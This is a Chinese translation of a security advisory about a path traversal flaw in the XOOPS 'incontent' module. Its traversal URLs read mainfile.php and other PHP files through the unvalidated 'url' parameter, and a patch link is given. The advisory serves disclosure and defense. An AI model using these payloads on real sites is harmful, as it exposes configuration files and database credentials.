[翻译]XOOPS 非内容模块泄露PHP文件内容
翻译网站:[url]http://www.bnso.net/[/url] 翻译:Z.C.Y[B.C.T]安全公告ID:1013034
发布作者:Lostmon <[email]lostmon@gmail.com[/email]>
资料来源:[url]http://securitytracker.com/id?1013034[/url]
CVE 参考:[url]http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH[/url]
漏洞影响:泄露系统信息,泄露用户信息
影响系统:所有的Linux , UNIX , Windows
含有漏洞利用程序:是
漏洞起因:操作控制错误,输入合法性错误
描述:XOOPS第三部分非内容模块存在漏洞,导致远程用户可以浏览PHP文件内容。
Lostmon很早就发现了这个漏洞。这个模块对用用户提交的输入在'url'参数中没有充分验证,导致远程用户
可以用下面类型的URL来浏览'mainfile.php'内容。
http://[target]/modules/incontent/index.php?op=aff&optio n=0&url=../../../mainfile.php
其他PHP文件用如下URLS方式被浏览:
http://[target]/modules/incontent/index.php?op=aff&option=0&url=../../. ./index.php
http://[target]/modules/incontent/index.php?op=aff&option=0&url=../../../header.php
解决方法:补丁
提供补丁地址:[url]http://www.e-xoops.ru/modules/mydownloads/visit.php?lid=330[/url]
页:
[1]